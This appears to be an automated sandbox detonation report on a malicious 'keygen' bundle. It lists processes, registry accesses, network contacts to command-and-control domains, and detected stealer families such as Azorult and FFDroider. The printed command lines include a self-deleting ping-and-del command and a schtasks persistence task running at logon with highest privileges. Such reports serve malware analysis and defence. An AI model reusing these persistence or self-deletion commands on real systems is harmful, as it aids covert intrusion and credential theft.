| PID 2588 wrote to memory of 3036 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2588 wrote to memory of 3036 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2588 wrote to memory of 3036 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2588 wrote to memory of 3036 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.16.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
Files
memory/2756-0-0x00000000002A0000-0x00000000002B8000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
136s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4516 wrote to memory of 468 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4516 wrote to memory of 468 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4516 wrote to memory of 468 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 468 wrote to memory of 3156 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 468 wrote to memory of 3156 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 468 wrote to memory of 3156 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.9.200.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
memory/4516-0-0x00000000014A0000-0x00000000014B8000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-08 22:25
Reported
2024-11-08 22:27
Platform
win7-20240903-en
Max time kernel
57s
Max time network
146s
Command Line
Signatures
Azorult
Azorult family
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Ffdroider family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Pony family
Pony,Fareit
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 624 set thread context of 2172 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
keygen-step-1.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
keygen-step-6.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
keygen-step-3.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
keygen-step-4.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104712 0
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe -txt -scanlocal -file:potato.dat
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 136
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.98:443 | evaexpand.com | tcp |
| UA | 194.145.227.161:80 | tcp | |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 185.77.97.228:443 | evaexpand.com | tcp |
| GB | 185.77.97.228:443 | evaexpand.com | tcp |
| GB | 185.77.97.228:443 | evaexpand.com | tcp |
| GB | 185.77.97.228:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.98:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| GB | 195.200.9.241:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 185.77.97.228:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| GB | 195.200.9.135:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 185.77.97.228:443 | evaexpand.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| GB | 195.200.9.205:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
